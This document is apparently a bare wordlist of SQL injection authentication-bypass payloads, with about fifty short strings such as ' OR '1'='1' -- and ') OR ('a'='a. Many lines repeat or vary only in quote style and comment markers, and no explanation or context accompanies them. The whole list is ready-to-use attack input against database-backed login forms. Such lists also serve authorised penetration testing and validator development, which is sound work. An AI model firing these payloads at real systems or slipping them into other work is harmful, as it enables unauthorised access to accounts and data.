' OR '1'='1
' OR 'x'='x
' OR '1'='1' --
' OR '1'='1' #
' OR '1'='1'/*
' OR ''=''
'='
'LIKE'
'LIKE%'
') OR ('a'='a
') OR ('1'='1
' OR '1'='1'--
" OR "1"="1
' OR '1'='1'/* 
' OR 'x'='x'#
' OR 1=1
' OR a=a
' OR ''=''
' OR 1=1 --
' OR 1=1#
' OR '1'='1'--
" OR "1"="1"--
' OR 1=1;#
' OR '1'='1'# 
' OR '1'='1'/* 
' OR 1=1
' OR "1"="1"
' OR 'x'='x'
' OR ''=''
' OR "a"="a"
' OR 1=1 --
' OR '1'='1'-- 
' OR 1=1 --
' OR "x"="x"#
' OR 1=1# 
' OR "1"="1"# 
' OR "a"="a"
' OR 1=1
' OR 1=1-- 
' OR "1"="1"
' OR 'x'='x'#
' OR "1"="1"#
' OR 1=1#
' OR "a"="a"
' OR '1'='1'-- 
' OR "x"="x"
' OR 1=1
' OR 1=1'--
' OR "x"="x"
' OR "1"="1"--
' OR 1=1--
' OR 'a'='a'--
